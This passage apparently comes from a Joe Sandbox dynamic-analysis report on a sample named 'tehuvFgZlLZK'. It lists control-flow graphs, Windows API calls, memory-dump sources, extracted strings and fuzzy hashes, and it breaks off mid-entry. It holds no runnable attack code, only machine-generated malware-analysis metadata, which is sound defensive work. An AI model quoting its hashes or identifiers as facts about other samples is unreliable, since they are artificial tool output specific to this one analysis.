b9cf0f 19444->19445 19451 b9ba80 19444->19451 19445->19403 19449 b9ced5 19447->19449 19448 b9cf0f 19448->19403 19449->19448 19450 b9ba80 3 API calls 19449->19450 19450->19448 19452 b9ba85 19451->19452 19453 b9dc28 19452->19453 19455 b9d27c 19452->19455 19456 b9d287 19455->19456 19457 b95cc4 3 API calls 19456->19457 19458 b9dc97 19457->19458 19458->19453 19350 b9d630 DuplicateHandle 19351 b9d6c6 19350->19351 19459 b9cfe0 19460 b9d026 GetCurrentProcess 19459->19460 19462 b9d078 GetCurrentThread 19460->19462 19463 b9d071 19460->19463 19464 b9d0ae 19462->19464 19465 b9d0b5 GetCurrentProcess 19462->19465 19463->19462 19464->19465 19468 b9d0eb 19465->19468 19466 b9d113 GetCurrentThreadId 19467 b9d144 19466->19467 19468->19466

                                  Executed Functions

                                  Function 06AD7860 Relevance: 9.8, Strings: 7, Instructions: 1042COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 294 6ad7860-6ad7881 295 6ad7888-6ad7974 294->295 296 6ad7883 294->296 298 6ad797a-6ad7ad1 295->298 299 6ad81a6-6ad81ce 295->299 296->295 343 6ad8174-6ad81a3 298->343 344 6ad7ad7-6ad7b32 298->344 302 6ad88b7-6ad88c0 299->302 304 6ad81dc-6ad81e5 302->304 305 6ad88c6-6ad88dd 302->305 306 6ad81ec-6ad82e0 304->306 307 6ad81e7 304->307 325 6ad830a 306->325 326 6ad82e2-6ad82ee 306->326 307->306 330 6ad8310-6ad8330 325->330 328 6ad82f8-6ad82fe 326->328 329 6ad82f0-6ad82f6 326->329 331 6ad8308 328->331 329->331 335 6ad8390-6ad840a 330->335 336 6ad8332-6ad838b 330->336 331->330 355 6ad840c-6ad845f 335->355 356 6ad8461-6ad84a4 335->356 347 6ad88b4 336->347 343->299 350 6ad7b34 344->350 351 6ad7b37-6ad7b42 344->351 347->302 350->351 354 6ad8086-6ad808c 351->354 357 6ad7b47-6ad7b65 354->357 358 6ad8092-6ad810f 354->358 383 6ad84af-6ad84b5 355->383 356->383 360 6ad7bbc-6ad7bd1 357->360 361 6ad7b67-6ad7b6b 357->361 401 6ad815e-6ad8164 358->401 366 6ad7bd8-6ad7bee 360->366 367 6ad7bd3 360->367 361->360 365 6ad7b6d-6ad7b78 361->365 370 6ad7bae-6ad7bb4 365->370 368 6ad7bf5-6ad7c0c 366->368 369 6ad7bf0 366->369 367->366 373 6ad7c0e 368->373 374 6ad7c13-6ad7c29 368->374 369->368 376 6ad7b7a-6ad7b7e 370->376 377 6ad7bb6-6ad7bb7 370->377 373->374 381 6ad7c2b 374->381 382 6ad7c30-6ad7c37 374->382 379 6ad7b84-6ad7b9c 376->379 380 6ad7b80 376->380 384 6ad7c3a-6ad7cab 377->384 386 6ad7b9e 379->386 387 6ad7ba3-6ad7bab 379->387 380->379 381->382 382->384 388 6ad850c-6ad8518 383->388 389 6ad7cad 384->389 390 6ad7cc1-6ad7e39 384->390 386->387 387->370 391 6ad851a-6ad85a2 388->391 392 6ad84b7-6ad84d9 388->392 389->390 393 6ad7caf-6ad7cbb 389->393 398 6ad7e4f-6ad7f8a 390->398 399 6ad7e3b 390->399 422 6ad8727-6ad8730 391->422 395 6ad84db 392->395 396 6ad84e0-6ad8509 392->396 393->390 395->396 396->388 412 6ad7f8c-6ad7f90 398->412 413 6ad7fee-6ad8003 398->413 399->398 402 6ad7e3d-6ad7e49 399->402 403 6ad8166-6ad816c 401->403 404 6ad8111-6ad815b 401->404 402->398 403->343 404->401 412->413 417 6ad7f92-6ad7fa1 412->417 415 6ad800a-6ad802b 413->415 416 6ad8005 413->416 419 6ad802d 415->419 420 6ad8032-6ad8051 415->420 416->415 421 6ad7fe0-6ad7fe6 417->421 419->420 428 6ad8058-6ad8078 420->428 429 6ad8053 420->429 424 6ad7fe8-6ad7fe9 421->424 425 6ad7fa3-6ad7fa7 421->425 426 6ad85a7-6ad85bc 422->426 427 6ad8736-6ad8791 422->427 430 6ad8083 424->430 431 6ad7fa9-6ad7fad 425->431 432 6ad7fb1-6ad7fd2 425->432 433 6ad85be 426->433 434 6ad85c5-6ad871b 426->434 451 6ad87c8-6ad87f2 427->451 452 6ad8793-6ad87c6 427->452 435 6ad807f 428->435 436 6ad807a 428->436 429->428 430->354 431->432 438 6ad7fd9-6ad7fdd 432->438 439 6ad7fd4 432->439 433->434 440 6ad85cb-6ad860b 433->440 441 6ad869a-6ad86da 433->441 442 6ad8655-6ad8695 433->442 443 6ad8610-6ad8650 433->443 455 6ad8721 434->455 435->430 436->435 438->421 439->438 440->455 441->455 442->455 443->455 460 6ad87fb-6ad888e 451->460 452->460 455->422 464 6ad8895-6ad88ad 460->464 464->347
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2172890632.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_6ad0000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 1a[9$3X2$4'jq$TJoq$Tejq$pnq$xbmq
                                  • API String ID: 0-4226763738
                                  • Opcode ID: d47da74156e1c3da243a4d137278836b7d15d1880c9dbed75c67ac3bcfd61ccb
                                  • Instruction ID: 068b428dfb8e1d1b1433feb12d500ce221d9183bb426a9897ffa33c2f715595e
                                  • Opcode Fuzzy Hash: d47da74156e1c3da243a4d137278836b7d15d1880c9dbed75c67ac3bcfd61ccb
                                  • Instruction Fuzzy Hash: 28B2C174E00628CFDB65DF69C984AD9BBB2FF89304F1581E9D509AB225DB319E81CF40
                                  Function 00B9CFE0 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 465 b9cfe0-b9d06f GetCurrentProcess 469 b9d078-b9d0ac GetCurrentThread 465->469 470 b9d071-b9d077 465->470 471 b9d0ae-b9d0b4 469->471 472 b9d0b5-b9d0e9 GetCurrentProcess 469->472 470->469 471->472 473 b9d0eb-b9d0f1 472->473 474 b9d0f2-b9d10d call b9d5b8 472->474 473->474 478 b9d113-b9d142 GetCurrentThreadId 474->478 479 b9d14b-b9d1ad 478->479 480 b9d144-b9d14a 478->480 480->479
                                  APIs
                                  • GetCurrentProcess.KERNEL32 ref: 00B9D05E
                                  • GetCurrentThread.KERNEL32 ref: 00B9D09B
                                  • GetCurrentProcess.KERNEL32 ref: 00B9D0D8
                                  • GetCurrentThreadId.KERNEL32 ref: 00B9D131
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2168674243.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_b90000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID: Current$ProcessThread
                                  • String ID:
                                  • API String ID: 2063062207-0
                                  • Opcode ID: 848a71c94c6d159be1709d024cbd16704667b7519b56878ccf2f0238ac4ffc04
                                  • Instruction ID: e9022ed33374ee3746a0ef582113f75d19443698f82662174f11f1899a398201
                                  • Opcode Fuzzy Hash: 848a71c94c6d159be1709d024cbd16704667b7519b56878ccf2f0238ac4ffc04
                                  • Instruction Fuzzy Hash: 3D5149B49007498FDB14DFAAD548B9EBFF5EF88304F208459D409B7360D778A984CB65
                                  Function 00B9CFD1 Relevance: 6.1, APIs: 4, Instructions: 127threadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 487 b9cfd1-b9d06f GetCurrentProcess 491 b9d078-b9d0ac GetCurrentThread 487->491 492 b9d071-b9d077 487->492 493 b9d0ae-b9d0b4 491->493 494 b9d0b5-b9d0e9 GetCurrentProcess 491->494 492->491 493->494 495 b9d0eb-b9d0f1 494->495 496 b9d0f2-b9d10d call b9d5b8 494->496 495->496 500 b9d113-b9d142 GetCurrentThreadId 496->500 501 b9d14b-b9d1ad 500->501 502 b9d144-b9d14a 500->502 502->501
                                  APIs
                                  • GetCurrentProcess.KERNEL32 ref: 00B9D05E
                                  • GetCurrentThread.KERNEL32 ref: 00B9D09B
                                  • GetCurrentProcess.KERNEL32 ref: 00B9D0D8
                                  • GetCurrentThreadId.KERNEL32 ref: 00B9D131
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2168674243.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_b90000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID: Current$ProcessThread
                                  • String ID:
                                  • API String ID: 2063062207-0
                                  • Opcode ID: 5bd2583696fbbbad57e154b53a94bcef32cefb66fa2e5c2d3473118c86b9afe8
                                  • Instruction ID: 355979950c4390e6697981e6af3d6ce0528959a5852d69fb2bbf1adc0e6cab12
                                  • Opcode Fuzzy Hash: 5bd2583696fbbbad57e154b53a94bcef32cefb66fa2e5c2d3473118c86b9afe8
                                  • Instruction Fuzzy Hash: 1A5168B4900349CFDB14DFA9D548B9EBBF5EF88304F208069D409B7360DB389984CB65
                                  Function 06ADDF00 Relevance: 2.6, Strings: 2, Instructions: 100COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 531 6addf00-6ade01c 546 6addfcd-6addfd0 531->546 547 6addfe7-6addff2 546->547 548 6addfd2 546->548 555 6addf10-6addfb3 547->555 556 6addf50 547->556 560 6addfa2-6addfab 548->560 555->546 556->555
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2172890632.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_6ad0000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Tejq$Tejq
                                  • API String ID: 0-942063033
                                  • Opcode ID: 2d9ac71787f07c8c35cc2ddb90e4105c24dcbeb70aa640c8bfae33a6075f6a3f
                                  • Instruction ID: e8771b16482a9d570093ffd1ff3e7ce2a78d0b7750469c39568fd61c8b0c815c
                                  • Opcode Fuzzy Hash: 2d9ac71787f07c8c35cc2ddb90e4105c24dcbeb70aa640c8bfae33a6075f6a3f
                                  • Instruction Fuzzy Hash: AE319C74B041158FEB88BB69C899A7EB7B6FFC8700F204429E517DB399DA309C05C791
                                  Function 00B9AD48 Relevance: 1.7, APIs: 1, Instructions: 191COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 572 b9ad48-b9ad57 573 b9ad59-b9ad66 call b9a06c 572->573 574 b9ad83-b9ad87 572->574 579 b9ad68 573->579 580 b9ad7c 573->580 576 b9ad89-b9ad93 574->576 577 b9ad9b-b9addc 574->577 576->577 583 b9ade9-b9adf7 577->583 584 b9adde-b9ade6 577->584 627 b9ad6e call b9afd1 579->627 628 b9ad6e call b9afe0 579->628 580->574 585 b9adf9-b9adfe 583->585 586 b9ae1b-b9ae1d 583->586 584->583 589 b9ae09 585->589 590 b9ae00-b9ae07 call b9a078 585->590 588 b9ae20-b9ae27 586->588 587 b9ad74-b9ad76 587->580 591 b9aeb8-b9af78 587->591 593 b9ae29-b9ae31 588->593 594 b9ae34-b9ae3b 588->594 595 b9ae0b-b9ae19 589->595 590->595 622 b9af7a-b9af7d 591->622 623 b9af80-b9afab GetModuleHandleW 591->623 593->594 598 b9ae48-b9ae51 call b9a088 594->598 599 b9ae3d-b9ae45 594->599 595->588 603 b9ae5e-b9ae63 598->603 604 b9ae53-b9ae5b 598->604 599->598 605 b9ae81-b9ae85 603->605 606 b9ae65-b9ae6c 603->606 604->603 610 b9ae8b-b9ae8e 605->610 606->605 608 b9ae6e-b9ae7e call b9a098 call b9a0a8 606->608 608->605 613 b9aeb1-b9aeb7 610->613 614 b9ae90-b9aeae 610->614 614->613 622->623 624 b9afad-b9afb3 623->624 625 b9afb4-b9afc8 623->625 624->625 627->587 628->587
                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 00B9AF9E
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2168674243.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_b90000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: 7a83afa73397105daa907af34535a123afcc4af3dd410a1b56661f463fa1725b
                                  • Instruction ID: 30d8804b8ac5a7e43222ba8a14c214ce3abaf01e3350864438dc204033775d9a
                                  • Opcode Fuzzy Hash: 7a83afa73397105daa907af34535a123afcc4af3dd410a1b56661f463fa1725b
                                  • Instruction Fuzzy Hash: 217144B0A00B058FDB24DF29D05575ABBF5FF88304F108A6ED48AD7A50DB35E949CB92
                                  Function 00B944B0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 629 b944b0-b959d9 CreateActCtxA 632 b959db-b959e1 629->632 633 b959e2-b95a3c 629->633 632->633 640 b95a4b-b95a4f 633->640 641 b95a3e-b95a41 633->641 642 b95a51-b95a5d 640->642 643 b95a60 640->643 641->640 642->643 645 b95a61 643->645 645->645
                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 00B959C9
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2168674243.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_b90000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: eeb12834e813b3070583ad83d1eb7ce068591eebf9a8e917f6d7ddcbe55fcb47
                                  • Instruction ID: 57184a7b454ad7fe598e9d83806775af09f91a9c7732057d3041579d502f8842
                                  • Opcode Fuzzy Hash: eeb12834e813b3070583ad83d1eb7ce068591eebf9a8e917f6d7ddcbe55fcb47
                                  • Instruction Fuzzy Hash: 1B41D1B0C0061DCBDB25DFA9C884B9DBBF6FF48304F20856AD408AB265DB756946CF94
                                  Function 00B9590C Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 646 b9590c-b959d9 CreateActCtxA 648 b959db-b959e1 646->648 649 b959e2-b95a3c 646->649 648->649 656 b95a4b-b95a4f 649->656 657 b95a3e-b95a41 649->657 658 b95a51-b95a5d 656->658 659 b95a60 656->659 657->656 658->659 661 b95a61 659->661 661->661
                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 00B959C9
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2168674243.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_b90000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: 82659cf24faa0c70185ae0f87e0ac90a0701c8756d50b3bbb22c4dd86691f8b1
                                  • Instruction ID: 8901e9336cb3d5c9b46b0d5cfd9c71269b7d9d8571aa54d99646f67008e31ace
                                  • Opcode Fuzzy Hash: 82659cf24faa0c70185ae0f87e0ac90a0701c8756d50b3bbb22c4dd86691f8b1
                                  • Instruction Fuzzy Hash: CB41E2B0D00619CBDB25CFA9C9847DDBBF2FF48304F20856AD408AB255DB756946CF50
                                  Function 00B9D630 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 662 b9d630-b9d6c4 DuplicateHandle 663 b9d6cd-b9d6ea 662->663 664 b9d6c6-b9d6cc 662->664 664->663
                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B9D6B7
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2168674243.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_b90000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: f4c7bb9736c3a59668cdbc2e8fc761b80ff63d1d0124395406908ac7258af80c
                                  • Instruction ID: 8a45016c3029d1826469ced7e4966fb9110e0c63520e7dc86e2ec83612061994
                                  • Opcode Fuzzy Hash: f4c7bb9736c3a59668cdbc2e8fc761b80ff63d1d0124395406908ac7258af80c
                                  • Instruction Fuzzy Hash: 3F21C4B59002489FDB10CFAAD584ADEBBF9FB48310F14845AE918A3350D379A954CFA5
                                  Function 00B9D629 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 667 b9d629-b9d6c4 DuplicateHandle 668 b9d6cd-b9d6ea 667->668 669 b9d6c6-b9d6cc 667->669 669->668
                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B9D6B7
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2168674243.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_b90000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: 3b27de7be42f511632105e6668222795ec5532968ace9ff9aa3f085e74c55279
                                  • Instruction ID: 97f573cb6d62a519ddbaf9357fd920dbefeb5428fd815abae0bdcc297fb3c162
                                  • Opcode Fuzzy Hash: 3b27de7be42f511632105e6668222795ec5532968ace9ff9aa3f085e74c55279
                                  • Instruction Fuzzy Hash: 0B21C2B5900249DFDB10CFAAD584ADEBBF5FB48314F14846AE918A7350C379A950CF64
                                  Function 00B9A0D0 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 672 b9a0d0-b9b200 674 b9b208-b9b237 LoadLibraryExW 672->674 675 b9b202-b9b205 672->675 676 b9b239-b9b23f 674->676 677 b9b240-b9b25d 674->677 675->674 676->677
                                  APIs
                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00B9B019,00000800,00000000,00000000), ref: 00B9B22A
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2168674243.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_b90000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 5dae3985c51b4fbf7f4cd6a4f041b4a0485ef789374e2cbc4589f14e3e25a186
                                  • Instruction ID: 0db60fd64085f8755b3df67409c78a7c0e65d7388308eca034a3dcb8587d7b52
                                  • Opcode Fuzzy Hash: 5dae3985c51b4fbf7f4cd6a4f041b4a0485ef789374e2cbc4589f14e3e25a186
                                  • Instruction Fuzzy Hash: DA1123B68003089FDB10CF9AD548BEEFBF5EB48310F10846AE919B7210C379A944CFA5
                                  Function 00B9B1B9 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 680 b9b1b9-b9b200 681 b9b208-b9b237 LoadLibraryExW 680->681 682 b9b202-b9b205 680->682 683 b9b239-b9b23f 681->683 684 b9b240-b9b25d 681->684 682->681 683->684
                                  APIs
                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00B9B019,00000800,00000000,00000000), ref: 00B9B22A
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2168674243.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_b90000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: d3003f90a5102879e016b4f4097f48b2a1c012302b6f363cec1af65ec6588864
                                  • Instruction ID: 508ebb99ed9ffe39316c7dc50138aff11ec8e8667463ba2e66a81078ae53dfd7
                                  • Opcode Fuzzy Hash: d3003f90a5102879e016b4f4097f48b2a1c012302b6f363cec1af65ec6588864
                                  • Instruction Fuzzy Hash: 691123B68003488FDB10CFAAD544ADEFFF5EF89320F14846AE519A7200C779A945CFA5
                                  Function 00B9AF38 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 687 b9af38-b9af78 688 b9af7a-b9af7d 687->688 689 b9af80-b9afab GetModuleHandleW 687->689 688->689 690 b9afad-b9afb3 689->690 691 b9afb4-b9afc8 689->691 690->691
                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 00B9AF9E
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2168674243.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_b90000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: 2c6fa3026d8a67d4e32427b9890c75cce0b9ba0f35d385d277cd74d1b616524d
                                  • Instruction ID: 07ef169326e55d167d22e56b1532a3bd8111075a1caac3c69c8fc6cb23c5d8be
                                  • Opcode Fuzzy Hash: 2c6fa3026d8a67d4e32427b9890c75cce0b9ba0f35d385d277cd74d1b616524d
                                  • Instruction Fuzzy Hash: 1711DFB6C002498FDB10DF9AD544BDEFBF5EB88324F10846AD819A7210D379A545CFA1
                                  Function 06AD74D8 Relevance: 1.4, Strings: 1, Instructions: 160COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2172890632.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_6ad0000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Tejq
                                  • API String ID: 0-2468842661
                                  • Opcode ID: 6151d795f0ebda6fed81a187ba50313a943541c33a6f27e098906e3ac6817055
                                  • Instruction ID: 80f50fdf1510e57d7db516f1f4a77a6a50d665a37d10dc578e970052e6c9fe43
                                  • Opcode Fuzzy Hash: 6151d795f0ebda6fed81a187ba50313a943541c33a6f27e098906e3ac6817055
                                  • Instruction Fuzzy Hash: E551E271B002054FCB04EB7988489AFBBF6EFC53207158969E45ACB391EF34DD068791
                                  Function 06AD90B0 Relevance: 1.4, Strings: 1, Instructions: 103COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2172890632.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_6ad0000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LRjq
                                  • API String ID: 0-665714880
                                  • Opcode ID: eab52c6584d560445906b41fb6c7d7a2dfec1320470b57142b9b3d6579253ec9
                                  • Instruction ID: fd0e71657c862eafda1bfae07c01edabc8a447ccaa416b89ac1dae6f30770aed
                                  • Opcode Fuzzy Hash: eab52c6584d560445906b41fb6c7d7a2dfec1320470b57142b9b3d6579253ec9
                                  • Instruction Fuzzy Hash: 91410674E012188FDB44DFA9D8556EEBBB2FB88310F10902AE415B7359DB349E02CBA1
                                  Function 06AD97D0 Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2172890632.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_6ad0000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Tejq
                                  • API String ID: 0-2468842661
                                  • Opcode ID: faddcc14f2a9da2bb374cde9a60bdbea0fe59d822f2fc9f677f7b42bc178e660
                                  • Instruction ID: 2287730265e3e6b8803e507d17647b637d4f5717d61ecc50a186aabb9f938af8
                                  • Opcode Fuzzy Hash: faddcc14f2a9da2bb374cde9a60bdbea0fe59d822f2fc9f677f7b42bc178e660
                                  • Instruction Fuzzy Hash: A7111C32F0021A8BDB58FBB999115EFB7F6AFC8710B204079C506EB254EB318D05CBA1
                                  Function 06AD69C0 Relevance: .1, Instructions: 138COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2172890632.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_6ad0000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d768e1247c834f9722597d624ca83feffd506dea6823e69474c020ad8ae6083e
                                  • Instruction ID: 086830bace6bb8544dbea72f5cce846fa95605eebd4208c57ecab4b3fef59b0b
                                  • Opcode Fuzzy Hash: d768e1247c834f9722597d624ca83feffd506dea6823e69474c020ad8ae6083e
                                  • Instruction Fuzzy Hash: 5051B2B4909784CFC706DF7AE594999BFB0EF8A201B2684C6C484DF2B7C6359D16C712
                                  Function 06AD6FD0 Relevance: .1, Instructions: 127COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2172890632.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_6ad0000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f0b62ba595a5e69dd6aa2ed7deb46fe29857b70db8194e4c96f0ae030b82a69c
                                  • Instruction ID: db9f2f86b36837a5f9bf8e699cd14d9f16521147cc46445e1f6256c693c80694
                                  • Opcode Fuzzy Hash: f0b62ba595a5e69dd6aa2ed7deb46fe29857b70db8194e4c96f0ae030b82a69c
                                  • Instruction Fuzzy Hash: BF51B274E012189FDB44DFA9D884AEEBBB2FF89311F109025E806B7359CB349946CF54
                                  Function 06ADED60 Relevance: .1, Instructions: 112COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2172890632.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_6ad0000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e7ea7f1fa455ef55b84686bb0b4f72f847dd78318eec7072b0de4a37cfd80f74
                                  • Instruction ID: 268350d325b5d719049e0d3d87ddafdc3826189c73f84cfd33a1b366e0146636
                                  • Opcode Fuzzy Hash: e7ea7f1fa455ef55b84686bb0b4f72f847dd78318eec7072b0de4a37cfd80f74
                                  • Instruction Fuzzy Hash: 3641AC31604514EFE799BF25D888A78B7B6FF86302B524469E1478FA54CB34EC82CBC5
                                  Function 06AD9B0C Relevance: .1, Instructions: 111COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2172890632.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_6ad0000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1f0617ff1274aa09ea528af57811381a87606b2f7d80543249337eb979474639
                                  • Instruction ID: 2ddd929dc2028375ed5d0aa4c74debf2d0bc62d051d51a3f280aacff1adefd4b
                                  • Opcode Fuzzy Hash: 1f0617ff1274aa09ea528af57811381a87606b2f7d80543249337eb979474639
                                  • Instruction Fuzzy Hash: 8B3157B1A083449FDB49EB78DC544EE7FB9DF46200B1544EAE846CB252EA39DD078361
                                  Function 06AD6E68 Relevance: .1, Instructions: 110COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2172890632.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_6ad0000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 54e632372a100eb213dccf9d78eedf99cbc01aa0756ed5ad864eede95dff4a9c
